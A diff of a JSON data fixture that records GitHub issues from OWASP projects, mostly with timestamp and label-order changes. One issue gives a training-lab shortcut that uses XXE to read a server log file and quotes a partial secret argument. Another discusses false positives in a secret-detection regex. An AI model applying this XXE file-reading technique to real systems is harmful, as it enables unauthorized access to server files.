'Imrpoper permissions' change to 'Improper permissions' ?", @@ -18296,7 +18296,7 @@ "pk": 597, "fields": { "nest_created_at": "2024-09-11T20:43:57.448Z", - "nest_updated_at": "2024-09-18T18:11:26.275Z", + "nest_updated_at": "2024-09-22T17:37:24.915Z", "node_id": "I_kwDODGftZc5fWt9s", "title": "SwSec 5D Survey", "body": "![SwSec 5D - Survey](https://user-images.githubusercontent.com/26579136/221373538-0a09d21d-1e81-47c7-b406-47b114221bac.jpg)\r\n", @@ -18324,7 +18324,7 @@ "pk": 598, "fields": { "nest_created_at": "2024-09-11T20:44:07.768Z", - "nest_updated_at": "2024-09-18T18:11:34.713Z", + "nest_updated_at": "2024-09-22T17:37:35.693Z", "node_id": "MDU6SXNzdWU5NTIzODAyOTU=", "title": "Add a Matrix ", "body": "Add a matrix (likely an .xlsx file) that:\r\n\r\n* Can be used as a checklist and note-taking / task-tracking\r\n* Includes links from each task’s inputs and outputs to their corresponding tasks, as described in the OWASP-Vuln-MGM-Guide-Jul23-2020.pdf file", @@ -18356,7 +18356,7 @@ "pk": 599, "fields": { "nest_created_at": "2024-09-11T20:44:19.189Z", - "nest_updated_at": "2024-09-18T18:11:43.656Z", + "nest_updated_at": "2024-09-22T17:37:47.071Z", "node_id": "I_kwDODGfszM5G7xDs", "title": "Attack Surface Detector plugin will allways start spider", "body": "After executing Attack Surface Detector plugin in Owasp Zap Proxy, it will try to spider the application even if the checkbox **Automatically start spider after importing endpoints** is unchecked. \r\n\r\nHere is a print showing the problem:\r\n![image](https://user-images.githubusercontent.com/952143/161310230-ae1ce899-278e-441e-b646-afda9411e089.png)\r\n", @@ -18656,7 +18656,7 @@ "pk": 609, "fields": { "nest_created_at": "2024-09-11T20:45:03.351Z", - "nest_updated_at": "2024-09-18T19:13:03.826Z", + "nest_updated_at": "2024-09-22T20:30:09.124Z", "node_id": "I_kwDODDeA9s5nCeMu", "title": "Translate standard documentation into Vietnamese language", "body": "Software Supply Chain Security become a critical approach for many security programs. Vietnam is also a country that adopts new standards, and processes to enhance their chance in Software Supply Chain. Having a Vietnamese version of the standard may help easier to understand to onboard the standard for those users who are not security professional", @@ -18745,7 +18745,7 @@ "pk": 612, "fields": { "nest_created_at": "2024-09-11T20:45:49.447Z", - "nest_updated_at": "2024-09-18T18:12:43.771Z", + "nest_updated_at": "2024-09-22T17:39:11.673Z", "node_id": "MDU6SXNzdWU0NzM2MjAzMzE=", "title": "Complete GitHub Checklist ", "body": "", @@ -18917,7 +18917,7 @@ "pk": 618, "fields": { "nest_created_at": "2024-09-11T20:45:59.179Z", - "nest_updated_at": "2024-09-18T18:12:47.885Z", + "nest_updated_at": "2024-09-22T17:39:16.701Z", "node_id": "I_kwDOC7ie5M5ae9Ca", "title": "Missing README.md", "body": "hello there this branch is missing Readme.md file.", @@ -19341,7 +19341,7 @@ "pk": 633, "fields": { "nest_created_at": "2024-09-11T20:46:20.590Z", - "nest_updated_at": "2024-09-18T18:12:56.213Z", + "nest_updated_at": "2024-09-22T17:39:49.748Z", "node_id": "I_kwDOC5rfps6FvH03", "title": "Improve the OWASP UI", "body": "The overall UI for the entire OWASP site looks and feels inconsistent, which can cause new visitors to quickly lose their trust in OWASP itself, which doesn't give a good impression, especially for an organisation that focuses on cybersecurity.\r\n\r\nI'm aware that OWASP use a customised theme for the site, but I believe that they can benefit from having their website redesigned from the ground up, so that it looks more consistent, trustworthy, and professional, not just for newcomers, but also for returning visitors and paying members.\r\n\r\nFurther, isn't one of OWASP's Top 10 items Insecure Design?\r\n\r\nNot only does that relate to how cybersecurity solutions themselves are designed (so that they can be secure), but also how those solutions (specifically user interfaces on an app, websites, etc) look visually, since in this case, you pretty much have to judge a book by its cover to determine whether it is secure and trustworthy by design (both in terms of security and aesthetics), since poorly designed websites and badly formatted emails can be viewed as a cybersecurity threat, and in most cases, that's how they're often perceived.\r\n\r\nSource: I am currently a UI Designer for a cybersecurity startup, so improving the UI for OWASP is something that I am fully able to do.", @@ -19369,7 +19369,7 @@ "pk": 634, "fields": { "nest_created_at": "2024-09-11T21:07:22.730Z", - "nest_updated_at": "2024-09-18T18:13:03.111Z", + "nest_updated_at": "2024-09-22T17:40:04.833Z", "node_id": "I_kwDOC5InlM5bC3YM", "title": "Head and Body tag is missing in 'index.html' file.", "body": "Head and Body tag is missing in 'index.html' file. This may cause problem in live reloading as well in SEO.", @@ -19425,7 +19425,7 @@ "pk": 636, "fields": { "nest_created_at": "2024-09-11T21:07:32.198Z", - "nest_updated_at": "2024-09-18T18:13:10.027Z", + "nest_updated_at": "2024-09-22T17:40:12.575Z", "node_id": "MDU6SXNzdWU0OTQ0OTY4NzE=", "title": "Installation of PIP doesn't work", "body": "Hi team, \r\n\r\n This might be obvious to few people, but i wanted to put it out here anyway for future reference. \r\n\r\nI tried installing pip-python, but it installs an older version by default and doesn't install the requirements as well. \r\n\r\nWhat worked is when i installed pip3/python3 as follows in UBUNTU:\r\n\r\n apt install python3\r\n apt install python3-pip\r\n pip3 install -r requirements.txt\r\n python3 wpbullet.py -path=\"\"", @@ -19737,7 +19737,7 @@ "pk": 647, "fields": { "nest_created_at": "2024-09-11T21:08:37.437Z", - "nest_updated_at": "2024-09-18T18:13:56.757Z", + "nest_updated_at": "2024-09-22T17:41:08.017Z", "node_id": "I_kwDOCsQxbc5VqGws", "title": "Track if a published version can be deleted", "body": "Very useful project. Thank you.\r\n\r\nThere was a twitter thread a few months ago, around the time of [this incident](https://twitter.com/balloob/status/1545510244381446144).\r\n\r\n\"which package ecosystems protect downstream libs/apps from a published version of an upstream lib being deleted\"\r\nhttps://twitter.com/mrinal/status/1546250871784108033\r\n\r\nThe thread captured, state of this for:\r\n\r\n- Rust https://twitter.com/mrinal/status/1546250872711024641\r\n- JS https://twitter.com/mrinal/status/1546250873851875329\r\n- Go https://twitter.com/mrinal/status/1546250874908921858\r\n- Erlang/Elixir https://twitter.com/mrinal/status/1546250875961675776\r\n- Java / Scala/ other JVM https://twitter.com/mrinal/status/1546250876997685249\r\n- Ruby https://twitter.com/mrinal/status/1546250878008537089\r\n- Swift https://twitter.com/mrinal/status/1546250878977380353\r\n- Python https://twitter.com/mrinal/status/1546250879853928448\r\n- Github Packages https://twitter.com/mrinal/status/1546265142580547584\r\n- Docker Hub https://twitter.com/mrinal/status/1546266861989351424\r\n\r\nI [wished at the time](https://twitter.com/mrinal/status/1546270715334180866) for something like packman and today someone pointed me packman :)\r\n\r\nIf there is interest in tracking this aspect, I'd be happy to send pull request.\r\n", @@ -19823,7 +19823,7 @@ "pk": 650, "fields": { "nest_created_at": "2024-09-11T21:09:12.077Z", - "nest_updated_at": "2024-09-18T18:14:16.723Z", + "nest_updated_at": "2024-09-22T17:41:35.837Z", "node_id": "MDU6SXNzdWU2Njg2ODQ3OTY=", "title": "Link to OWASP project page gives 404", "body": "It's shown in github's main page: https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Application\r\nThanks", @@ -19907,7 +19907,7 @@ "pk": 653, "fields": { "nest_created_at": "2024-09-11T21:09:26.043Z", - "nest_updated_at": "2024-09-18T18:14:26.152Z", + "nest_updated_at": "2024-09-22T17:41:49.850Z", "node_id": "I_kwDOClJnec5DVrCk", "title": "Project Development", "body": "**What would you like added?**\r\nThis is 2 years from the last Project update. Seem like this project is not developed anymore. So please assign me to join as a leader and contribute for this one. \r\n\r\nWould you like to be assigned to this issue?\r\n- [x] Assign me, please!\r\n", @@ -19937,7 +19937,7 @@ "pk": 654, "fields": { "nest_created_at": "2024-09-11T21:09:35.034Z", - "nest_updated_at": "2024-09-18T18:14:33.400Z", + "nest_updated_at": "2024-09-22T17:42:00.047Z", "node_id": "MDU6SXNzdWU2MTkzMTkwMDM=", "title": "Update Contribution Guidelines", "body": "Enhance the 'CONTRIBUTING.md' doc with more details", @@ -20087,7 +20087,7 @@ "pk": 659, "fields": { "nest_created_at": "2024-09-11T21:09:45.435Z", - "nest_updated_at": "2024-09-18T18:14:38.138Z", + "nest_updated_at": "2024-09-22T17:42:05.717Z", "node_id": "MDU6SXNzdWU0MTM5MzE3NjQ=", "title": "Add Secure-Header-Checker tool written in python", "body": "Hi, Can I make PR that contain Secure-Header-Checker tool written in python for this project?", @@ -20395,8 +20395,8 @@ "repository": 1067, "assignees": [], "labels": [ - 159, - 160 + 160, + 159 ] } }, @@ -20405,7 +20405,7 @@ "pk": 669, "fields": { "nest_created_at": "2024-09-11T21:10:11.023Z", - "nest_updated_at": "2024-09-18T19:11:45.189Z", + "nest_updated_at": "2024-09-22T20:27:19.718Z", "node_id": "I_kwDOCdd2e85yAnUc", "title": "Persian Translation for 2023", "body": "Hi Guys\r\nI could contribute to translate the API TOP10 2023RC to Farsi/Persian & would want to know your opinion on this matter. We did the Persian translation for 2019 version as well.\r\n@PauloASilva \r\n", @@ -20461,8 +20461,8 @@ 299 ], "labels": [ - 156, - 160 + 160, + 156 ] } }, @@ -20492,8 +20492,8 @@ "repository": 1067, "assignees": [], "labels": [ - 156, - 160 + 160, + 156 ] } }, @@ -21758,7 +21758,7 @@ "pk": 711, "fields": { "nest_created_at": "2024-09-11T21:11:48.234Z", - "nest_updated_at": "2024-09-11T21:11:48.234Z", + "nest_updated_at": "2024-09-20T17:34:16.675Z", "node_id": "I_kwDOCbL1IM6VrEwf", "title": "Update: Threat_Modeling_Cheat_Sheet", "body": "\r\n\r\n## What is missing or needs to be updated?\r\n\r\nAdding reference tools and training\r\n\r\n\r\n## How should this be resolved?\r\n\r\n\r\nAdd a tool: Threat composer \r\n[Demo](https://awslabs.github.io/threat-composer), [Repo](https://github.com/awslabs/threat-composer/)\r\n\r\nAdd AWS' free online training: \r\nThreat modeling for builders, available on [AWS Workshop Studio](https://catalog.workshops.aws/threatmodel/en-US), and [AWS SkillBuilder](https://explore.skillbuilder.aws/learn/course/external/view/elearning/13274/threat-modeling-for-builders-workshop)\r\n\r\n\r\n", @@ -21771,10 +21771,10 @@ "sequence_id": 2511096863, "is_locked": false, "lock_reason": "", - "comments_count": 1, + "comments_count": 3, "closed_at": null, "created_at": "2024-09-06T19:48:44Z", - "updated_at": "2024-09-09T09:19:19Z", + "updated_at": "2024-09-19T16:56:37Z", "author": 333, "repository": 1070, "assignees": [ @@ -21791,7 +21791,7 @@ "pk": 712, "fields": { "nest_created_at": "2024-09-11T21:11:53.800Z", - "nest_updated_at": "2024-09-18T18:15:02.447Z", + "nest_updated_at": "2024-09-22T17:45:07.977Z", "node_id": "I_kwDOCbLy9s51Pldf", "title": "Error Deploying DVSA", "body": "When trying to deploy DVSA I encountered an error with the S3 Bucket Permissions, I kept getting 403s, I believe I have fixed the issue by fixing the references to the S3 buckets. I believe since the buckets referenced in the policies were done by a function there was a race condition where the permission policy would attempt to be created before the S3 bucket was finished creating.\r\n\"Untitled\"\r\n\r\n I swapped the reference to the actual buckets in the Cloudformation template and it appears to be working now. \r\n \r\n \r\n![Capture](https://github.com/OWASP/DVSA/assets/2498490/a8d758d2-7d3f-451b-a28f-b113a3641c24)\r\n", @@ -21987,7 +21987,7 @@ "pk": 719, "fields": { "nest_created_at": "2024-09-11T21:12:03.312Z", - "nest_updated_at": "2024-09-18T18:15:06.771Z", + "nest_updated_at": "2024-09-22T17:45:15.816Z", "node_id": "I_kwDOCapMk85JcUou", "title": "Application not found.", "body": "I tried visiting [AWS Serverless Application Repository](https://serverlessrepo.aws.amazon.com/applications/arn:aws:serverlessrepo:us-east-1:761130837472:applications~serverless-goat) from the README.md but was given the following error. Was the application migrated?\r\n\r\n---\r\nThe application you were looking for could not be found. [Return to the applications search page](https://serverlessrepo.aws.amazon.com/applications).\r\n\r\n---", @@ -22015,7 +22015,7 @@ "pk": 720, "fields": { "nest_created_at": "2024-09-11T21:12:11.637Z", - "nest_updated_at": "2024-09-18T18:15:13.569Z", + "nest_updated_at": "2024-09-22T17:45:25.230Z", "node_id": "MDU6SXNzdWUzODY1MTgxMTc=", "title": "What is purpose of this repo?", "body": "Saw this new repo and that it's active.\r\n\r\nWhat is its overall purpose? \r\n\r\nJust curious as it looked interesting. Thanks.", @@ -22043,7 +22043,7 @@ "pk": 721, "fields": { "nest_created_at": "2024-09-11T21:12:20.047Z", - "nest_updated_at": "2024-09-18T18:15:20.161Z", + "nest_updated_at": "2024-09-22T17:45:33.089Z", "node_id": "MDU6SXNzdWUzNjY3OTE0NzU=", "title": "Add images to owasp-chapters open letter", "body": "page is now here https://github.com/OWASP/open-letters-to-owasp/blob/master/from-owasp-chapters/04-Oct-2018.md\r\n\r\nImages and original letter is here https://docs.google.com/document/d/14ggTe7yx4ddDanNKDuwnvotI9Dz9v4j-5P-27gboEIs/edit", @@ -22323,7 +22323,7 @@ "pk": 731, "fields": { "nest_created_at": "2024-09-11T21:12:32.146Z", - "nest_updated_at": "2024-09-18T18:15:24.319Z", + "nest_updated_at": "2024-09-22T17:45:37.441Z", "node_id": "MDU6SXNzdWU4OTk4MzUzNTY=", "title": "Regex Improvement: False Positive while using a series of asterisks", "body": "Here are some false positive examples:\r\n- `ssl.truststore.password=*********`\r\n- `password=*********`\r\n- `password:*********`\r\n- `pass=********`\r\n- `secret=*********`\r\n- `secret:*********`\r\n\r\nFor now of course we've just recommended utilizing an all text fake password but it'd be nice if these weren't flagged.\r\n\r\nSomehow these could be baked into the regexes but we haven't done work for that yet. If they were able to be included and no longer blocked it'd be important the `*` is still recognized as a special character.\r\n\r\n\r\nIt seems like this would be another good candidate for some type of regex acceptlist as mentioned [here](https://github.com/OWASP/SEDATED/issues/11) in order to not introduce more complexity into the regexes as well as handle false positives in the future.", @@ -22727,23 +22727,23 @@ "pk": 745, "fields": { "nest_created_at": "2024-09-11T21:13:03.123Z", - "nest_updated_at": "2024-09-18T19:12:56.457Z", + "nest_updated_at": "2024-09-22T20:29:57.423Z", "node_id": "I_kwDOCMFoCc5vxONL", "title": "D06,D08,D09,D10 content lost", "body": "D06,D08,D09,D10 content lost? why? someone delete or may I do something to recompile them?", "summary": "The issue discusses concerns about the loss of content for specific items labeled D06, D08, D09, and D10, questioning whether the content was deleted or if a recompilation is needed. The user is seeking clarification on the cause of the loss and potential solutions. There is an underlying frustration regarding the management and accessibility of this content.", "hint": "To address the issue of lost content in D06, D08, D09, and D10, you can follow these steps:\n\n1. **Identify the Scope of the Loss**: Determine exactly what content is missing in each of the D06, D08, D09, and D10 files or systems.\n\n2. **Check Backup Systems**: If backups are available, check the most recent backup to see if the lost content can be restored.\n\n3. **Review Change Logs**: Look into any change logs or version control systems to identify any recent changes that might have led to the content being deleted.\n\n4. **Consult Team Members**: Speak with colleagues or team members who may have access or knowledge regarding the D06, D08, D09, and D10 files to see if they can provide insight into the loss.\n\n5. **Examine Deletion History**: If using a system that tracks deletions, examine the deletion history to see if there are records of who deleted the content and when.\n\n6. **Check for Accidental Actions**: Reflect on any actions you might have taken recently that could have inadvertently led to the loss of content, such as misconfiguration or accidental deletions.\n\n7. **Recompile or Recreate Content**: If recovery is not possible, consider recompiling or recreating the lost content based on available documentation or previous versions.\n\n8. **Implement Recovery Measures**: Establish or reinforce measures for future content management, such as regular backups or version control protocols.\n\n9. **Document the Incident**: Make a record of the incident, including what was lost, how it was lost, and the steps taken to recover it to inform future practices.\n\n10. **Review Security Practices**: Assess and improve security measures in place to prevent unauthorized deletions or alterations in the future. \n\nFollowing these steps can help you diagnose the issue, recover lost content, and safeguard against future occurrences.", - "state": "open", - "state_reason": "", + "state": "closed", + "state_reason": "completed", "url": "https://github.com/OWASP/Docker-Security/issues/50", "number": 50, "sequence_id": 1875174219, "is_locked": false, "lock_reason": "", - "comments_count": 0, - "closed_at": null, + "comments_count": 2, + "closed_at": "2024-09-19T14:29:17Z", "created_at": "2023-08-31T09:48:05Z", - "updated_at": "2023-08-31T09:48:05Z", + "updated_at": "2024-09-19T14:29:17Z", "author": 355, "repository": 1080, "assignees": [], @@ -22783,7 +22783,7 @@ "pk": 747, "fields": { "nest_created_at": "2024-09-11T21:13:12.343Z", - "nest_updated_at": "2024-09-18T19:11:25.436Z", + "nest_updated_at": "2024-09-22T20:26:40.269Z", "node_id": "MDU6SXNzdWUzODE1OTI5NjU=", "title": "How to collaborate?", "body": "As of today @nu11p0inter is the leader of the project and handles most of the work himself (at least that is my impression). I think the project could benefit from:\r\n\r\n1. Defining roles and responsibilities that we need to complete the project\r\n2. Get volunteers to sign up for ☝️ \r\n3. Define how to collaborate, set up periodic calls for project members and general public to participate and how to track progress", @@ -23019,7 +23019,7 @@ "pk": 755, "fields": { "nest_created_at": "2024-09-11T21:13:29.879Z", - "nest_updated_at": "2024-09-18T18:15:48.565Z", + "nest_updated_at": "2024-09-22T17:46:19.209Z", "node_id": "MDU6SXNzdWU0Mjc3MTY0MDk=", "title": "Can this be removed?", "body": "Just asking :)", @@ -23193,7 +23193,7 @@ "pk": 761, "fields": { "nest_created_at": "2024-09-11T21:13:43.602Z", - "nest_updated_at": "2024-09-18T18:15:55.169Z", + "nest_updated_at": "2024-09-22T17:46:27.047Z", "node_id": "I_kwDOCE4w7c6EoYl3", "title": "Problem with requirements", "body": "Hi,\r\nI've followed the installation steps and guide given in the wiki page, but I\\`ve got this error while starting via `python ohp.py --start-api-server` and the same error in docker compose: `ImportError: cannot import name 'url_quote' from 'werkzeug.urls'`\r\nI\\`ve googled it and I understood that version of werkzeug must be the same as flask version, so I\\`ve updated `requrements.txt`\r\nThan I\\`ve got this error:\r\n![изображение](https://github.com/OWASP/Python-Honeypot/assets/166014299/3ce0b04b-f959-469a-bfdc-ad1a18788b73)\r\n\r\n\r\n\r\n_________________\r\n**OS**: `Ubuntu`\r\n\r\n**OS Version**: `22.04`\r\n\r\n**Python Version**: `3.10.12`", @@ -23221,7 +23221,7 @@ "pk": 762, "fields": { "nest_created_at": "2024-09-11T21:13:57.204Z", - "nest_updated_at": "2024-09-18T18:16:05.448Z", + "nest_updated_at": "2024-09-22T17:46:42.586Z", "node_id": "MDU6SXNzdWU4MjI1MTc3NjE=", "title": "Couldn't find minutes of the meet conducted @26th Feb 2021", "body": "This [link](https://www.owasp.org/index.php/Women_In_AppSec) appears broken, has it migrated to somewhere else?\r\n", @@ -23455,7 +23455,7 @@ "pk": 770, "fields": { "nest_created_at": "2024-09-11T21:14:13.860Z", - "nest_updated_at": "2024-09-18T19:02:21.084Z", + "nest_updated_at": "2024-09-22T19:25:01.986Z", "node_id": "I_kwDOB9f3oc5gsWed", "title": "Lists of feature and optimisation requirements", "body": "### initiatives\r\n\r\nThe project has been idle for a while. The issue will be created as a root ticket to gather new items (including some of the old tickets) which are going to be implemented.\r\n\r\n### Items\r\n\r\n- [x] [FEAT] Develop alternative small-footprint honeypot/probe formats.\r\n- [ ] [FEAT] pluggable modules #9 \r\n- [ ] [OPT] Consider new alternatives for log transfer approaches. #6\r\n- [ ] [OPT] The project structure may be a little confusing for individuals to run it. Consider refactoring the structure of the docker-compose file, the folder structure, and the README file.\r\n- [ ] [FIX] images cannot work correctly in some OS (e.g., MacOS) because it does not specify the version.\r\n", @@ -23830,7 +23830,7 @@ "pk": 783, "fields": { "nest_created_at": "2024-09-11T21:14:31.581Z", - "nest_updated_at": "2024-09-18T18:16:17.088Z", + "nest_updated_at": "2024-09-22T17:46:59.007Z", "node_id": "I_kwDOB5_xwc5iHEeY", "title": "no such module 'Realm'", "body": "ive opened the xcode project and attempt to build but in the insecure data storage -- Realm -- RealmExerciseVC, i get 'no such module 'realm' . ive run pod install and made sure cocoapods is up to date, deleted the derived data directory and cleaned the build. still getting the error. not sure what else to do. ", @@ -24258,7 +24258,7 @@ "pk": 798, "fields": { "nest_created_at": "2024-09-11T21:14:53.723Z", - "nest_updated_at": "2024-09-18T18:16:23.945Z", + "nest_updated_at": "2024-09-22T17:47:07.848Z", "node_id": "I_kwDOB4M0TM5sfPlA", "title": "Cyber", "body": "", @@ -24482,7 +24482,7 @@ "pk": 806, "fields": { "nest_created_at": "2024-09-11T21:15:04.440Z", - "nest_updated_at": "2024-09-18T19:02:43.310Z", + "nest_updated_at": "2024-09-22T19:25:33.455Z", "node_id": "I_kwDOB4MVSM5uB48n", "title": "DisplayUnlockCaptcha ", "body": "### Steps to reproduce\r\n\r\nno longer valid:\r\n\r\nhttps://accounts.google.com/DisplayUnlockCaptcha\r\n\r\nresult:\r\n\r\n> This website is no longer available\r\n>\r\n> To better protect your account, Google no longer allows account access with this website.\r\n>\r\n> If you have trouble signing in, try again from a familiar device or location.\r\n\r\nbut still in the code:\r\n\r\nhttps://github.com/search?q=repo%3AOWASP%2FSecureTea-Project%20DisplayUnlockCaptcha%20&type=code", @@ -24510,7 +24510,7 @@ "pk": 807, "fields": { "nest_created_at": "2024-09-11T21:15:18.691Z", - "nest_updated_at": "2024-09-18T18:16:34.716Z", + "nest_updated_at": "2024-09-22T17:47:32.357Z", "node_id": "MDU6SXNzdWUzMDIwMjY4MDc=", "title": "Convert pdf into markdown ", "body": "this one https://github.com/OWASP/user-security-stories/blob/master/user-security-stories.pdf", @@ -24566,7 +24566,7 @@ "pk": 809, "fields": { "nest_created_at": "2024-09-11T21:15:27.723Z", - "nest_updated_at": "2024-09-18T18:16:44.032Z", + "nest_updated_at": "2024-09-22T17:47:43.155Z", "node_id": "MDU6SXNzdWU0MDEwNDQwNDk=", "title": "Future of lapse+", "body": "Hi @maldevel,\r\n\r\nFirst I was very happy to see lapse-plus being migrated to OWASP, but unfortunately it's inactive. Are there any plans for revival or further development?\r\n\r\nI liked the idea of this tool some years ago and also contributed some minor additions: https://github.com/bergerbd/lapse-plus/commits?author=nyc2\r\n\r\nOr, if there are no future plans, can you recommend an alternative using similar source->sink approach?\r\n", @@ -24624,7 +24624,7 @@ "pk": 811, "fields": { "nest_created_at": "2024-09-11T21:15:57.813Z", - "nest_updated_at": "2024-09-18T18:17:05.657Z", + "nest_updated_at": "2024-09-22T17:48:08.180Z", "node_id": "MDU6SXNzdWU2NDg1NzQ4Mjg=", "title": "How does OFF relate to SARIF?", "body": "Seems like this effort is very similar to: https://github.com/sarif-standard\r\n\r\nStatic Analysis Results Interchange Format (SARIF) - A proposed standard for the output format of static analysis tools.\r\n\r\nMaybe join forces with, or simply work on that instead? Ideally, the format would support results from any type of appsec tool, not just static (e.g., SAST, DAST, IAST, and SCA (known CVEs in libraries)).", @@ -24904,7 +24904,7 @@ "pk": 821, "fields": { "nest_created_at": "2024-09-11T21:16:13.550Z", - "nest_updated_at": "2024-09-18T19:12:41.571Z", + "nest_updated_at": "2024-09-22T20:29:01.675Z", "node_id": "I_kwDOBgZk1M6RvJHr", "title": "A shortcut for Second Degree Black Belt - Using Components with Known Vulnerabilities & Insecure Deserialization", "body": "Exploit XXE alone to view `/usr/local/tomcat/logs/catalina.2023-10-05.log` on `host2`:\r\n```\r\nargument:\r\n-DSECRET3=/code/getCode.html#eyJhbGciOiJIUz...\r\n```", @@ -24932,7 +24932,7 @@ "pk": 822, "fields": { "nest_created_at": "2024-09-11T21:16:21.820Z", - "nest_updated_at": "2024-09-18T18:17:19.295Z", + "nest_updated_at": "2024-09-22T17:48:34.814Z", "node_id": "I_kwDOBbwtEM6UpsjK", "title": "Add disclaimer for vistors´ photos", "body": "... so that we can use a front page picture for 2025.", @@ -24960,7 +24960,7 @@ "pk": 823, "fields": { "nest_created_at": "2024-09-11T21:16:51.512Z", - "nest_updated_at": "2024-09-18T18:17:44.159Z", + "nest_updated_at": "2024-09-22T17:49:09.233Z", "node_id": "MDU6SXNzdWUyNjAzOTA0MDY=", "title": "Your cert expired", "body": "https://owaspsummit.org has an expired TLS cert.\r\n", @@ -25273,8 +25273,8 @@ "repository": 1119, "assignees": [], "labels": [ - 182, - 184 + 184, + 182 ] } }, @@ -25306,9 +25306,9 @@ 415 ], "labels": [ + 184, 180, - 182, - 184 + 182 ] } }, @@ -25749,9 +25749,9 @@ "repository": 1119, "assignees": [], "labels": [ + 185, 179, - 182, - 185 + 182 ] } }, @@ -25781,9 +25781,9 @@ "repository": 1119, "assignees": [], "labels": [ + 186, 179, - 182, - 186 + 182 ] } }, @@ -26497,8 +26497,8 @@ "repository": 1119, "assignees": [], "labels": [ - 181, - 187 + 187, + 181 ] } }, @@ -27105,8 +27105,8 @@ "repository": 1122, "assignees": [], "labels": [ - 191, - 193 + 193, + 191 ] } }, @@ -27138,8 +27138,8 @@ 450 ], "labels": [ - 191, - 194 + 194, + 191 ] } }, @@ -27171,8 +27171,8 @@ 450 ], "labels": [ - 191, - 194 + 194, + 191 ] } }, @@ -27202,8 +27202,8 @@ "repository": 1122, "assignees": [], "labels": [ - 191, - 193 + 193, + 191 ] } }, @@ -27802,7 +27802,7 @@ "pk": 915, "fields": { "nest_created_at": "2024-09-11T21:19:55.839Z", - "nest_updated_at": "2024-09-18T18:18:10.082Z", + "nest_updated_at": "2024-09-22T18:21:50.169Z", "node_id": "MDU6SXNzdWUyMTgzNDA1NzE=", "title": "deprecate Trello for managing Roadmap", "body": "https://trello.com/b/kyx0xHcu/owasp-virtual-village <-- Deprecated ", @@ -27980,8 +27980,8 @@ "repository": 1127, "assignees": [], "labels": [ - 205, - 208 + 208, + 205 ] } }, @@ -28164,8 +28164,8 @@ "repository": 1127, "assignees": [], "labels": [ - 202, 209, + 202, 211 ] } @@ -28260,8 +28260,8 @@ "repository": 1127, "assignees": [], "labels": [ - 207, - 211 + 211, + 207 ] } }, @@ -28294,9 +28294,9 @@ ], "labels": [ 202, + 211, 205, - 206, - 211 + 206 ] } }, @@ -28386,8 +28386,8 @@ "repository": 1127, "assignees": [], "labels": [ - 202, - 208 + 208, + 202 ] } }, @@ -28569,8 +28569,8 @@ "repository": 1127, "assignees": [], "labels": [ - 202, 208, + 202, 211 ] } @@ -28601,8 +28601,8 @@ "repository": 1127, "assignees": [], "labels": [ - 202, 208, + 202, 211 ] } @@ -28757,8 +28757,8 @@ "repository": 1127, "assignees": [], "labels": [ - 202, - 209 + 209, + 202 ] } }, @@ -28848,8 +28848,8 @@ "repository": 1127, "assignees": [], "labels": [ - 202, - 208 + 208, + 202 ] } }, @@ -28879,8 +28879,8 @@ "repository": 1127, "assignees": [], "labels": [ - 207, - 211 + 211, + 207 ] } }, @@ -29155,8 +29155,8 @@ "repository": 1127, "assignees": [], "labels": [ - 202, - 208 + 208, + 202 ] } }, @@ -29586,9 +29586,9 @@ "repository": 1127, "assignees": [], "labels": [ + 208, 202, - 206, - 208 + 206 ] } }, @@ -29679,8 +29679,8 @@ "repository": 1127, "assignees": [], "labels": [ - 211, - 216 + 216, + 211 ] } }, @@ -29864,8 +29864,8 @@ "repository": 1127, "assignees": [], "labels": [ - 210, - 218 + 218, + 210 ] } }, @@ -29957,9 +29957,9 @@ "repository": 1127, "assignees": [], "labels": [ + 211, 205, - 206, - 211 + 206 ] } }, @@ -29989,9 +29989,9 @@ "repository": 1127, "assignees": [], "labels": [ + 211, 205, - 206, - 211 + 206 ] } }, @@ -30115,8 +30115,8 @@ "assignees": [], "labels": [ 202, - 207, - 211 + 211, + 207 ] } }, @@ -30205,8 +30205,8 @@ "assignees": [], "labels": [ 202, - 212, - 219 + 219, + 212 ] } }, @@ -30520,8 +30520,8 @@ "repository": 1127, "assignees": [], "labels": [ - 202, - 209 + 209, + 202 ] } }, @@ -30616,10 +30616,10 @@ "repository": 1127, "assignees": [], "labels": [ + 208, 202, 205, - 206, - 208 + 206 ] } }, @@ -30649,8 +30649,8 @@ "repository": 1127, "assignees": [], "labels": [ - 212, - 217 + 217, + 212 ] } }, @@ -30772,9 +30772,9 @@ "repository": 1127, "assignees": [], "labels": [ + 216, 202, - 204, - 216 + 204 ] } }, @@ -30804,8 +30804,8 @@ "repository": 1127, "assignees": [], "labels": [ - 202, 209, + 202, 214 ] } @@ -32015,8 +32015,8 @@ "repository": 1127, "assignees": [], "labels": [ - 207, - 222 + 222, + 207 ] } }, @@ -32046,8 +32046,8 @@ "repository": 1127, "assignees": [], "labels": [ - 207, - 222 + 222, + 207 ] } }, @@ -32077,8 +32077,8 @@ "repository": 1127, "assignees": [], "labels": [ - 207, - 222 + 222, + 207 ] } }, @@ -32108,8 +32108,8 @@ "repository": 1127, "assignees": [], "labels": [ - 207, - 222 + 222, + 207 ] } }, @@ -32139,8 +32139,8 @@ "repository": 1127, "assignees": [], "labels": [ - 207, - 222 + 222, + 207 ] } }, @@ -32170,8 +32170,8 @@ "repository": 1127, "assignees": [], "labels": [ - 207, - 222 + 222, + 207 ] } }, @@ -32201,8 +32201,8 @@ "repository": 1127, "assignees": [], "labels": [ - 207, - 222 + 222, + 207 ] } }, @@ -32232,8 +32232,8 @@ "repository": 1127, "assignees": [], "labels": [ - 207, - 222 + 222, + 207 ] } }, @@ -32263,8 +32263,8 @@ "repository": 1127, "assignees": [], "labels": [ - 207, - 222 + 222, + 207 ] } }, @@ -32294,8 +32294,8 @@ "repository": 1127, "assignees": [], "labels": [ - 207, - 222 + 222, + 207 ] } }, @@ -32325,8 +32325,8 @@ "repository": 1127, "assignees": [], "labels": [ - 207, - 222 + 222, + 207 ] } }, @@ -32356,8 +32356,8 @@ "repository": 1127, "assignees": [], "labels": [ - 207, - 222 + 222, + 207 ] } }, @@ -32387,8 +32387,8 @@ "repository": 1127, "assignees": [], "labels": [ - 207, - 222 + 222, + 207 ] } }, @@ -32418,8 +32418,8 @@ "repository": 1127, "assignees": [], "labels": [ - 207, - 222 + 222, + 207 ] } }, @@ -32449,8 +32449,8 @@ "repository": 1127, "assignees": [], "labels": [ - 207, - 222 + 222, + 207 ] } }, @@ -32482,8 +32482,8 @@ 477 ], "labels": [ - 207, - 222 + 222, + 207 ] } }, @@ -32513,8 +32513,8 @@ "repository": 1127, "assignees": [], "labels": [ - 207, - 222 + 222, + 207 ] } }, @@ -32544,8 +32544,8 @@ "repository": 1127, 